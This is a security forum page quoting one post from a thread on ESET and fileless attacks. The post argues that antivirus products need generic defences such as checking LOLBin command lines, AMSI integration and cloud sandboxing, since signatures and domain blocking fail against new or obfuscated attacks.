Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Of LoLBins, 0 Days, and ESET (Part 2)
Message
<blockquote data-quote="Trident" data-source="post: 1084096" data-attributes="member: 99014"><p>Once again, we are reaching the point where it should be mentioned that complete copy and paste of methods from vendor to vendor is not necessary.</p><p></p><p>For the highest efficiency against fileless malware, it is of <strong>extreme</strong> importance that generic methods are developed — e.g <strong>evaluating LOLBins command lines</strong> and terminating execution there and then, as well as working closely with the AMSI and proprietary hooking.</p><p>Just relying on web blocking and definitions is not enough as website/domain name may be new (or generated for the attack at the spot) as well as definitions on obfuscated code have 0 effectiveness.</p><p></p><p>Having cloud emulation (sandbox) is another great approach.</p><p></p><p>Then the question comes how important is blocking fileless attacks on home users machines.</p><p>We do not have enough information to conclude how prevalent these are.</p></blockquote><p></p>
[QUOTE="Trident, post: 1084096, member: 99014"] Once again, we are reaching the point where it should be mentioned that complete copy and paste of methods from vendor to vendor is not necessary. For the highest efficiency against fileless malware, it is of [B]extreme[/B] importance that generic methods are developed — e.g [B]evaluating LOLBins command lines[/B] and terminating execution there and then, as well as working closely with the AMSI and proprietary hooking. Just relying on web blocking and definitions is not enough as website/domain name may be new (or generated for the attack at the spot) as well as definitions on obfuscated code have 0 effectiveness. Having cloud emulation (sandbox) is another great approach. Then the question comes how important is blocking fileless attacks on home users machines. We do not have enough information to conclude how prevalent these are. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
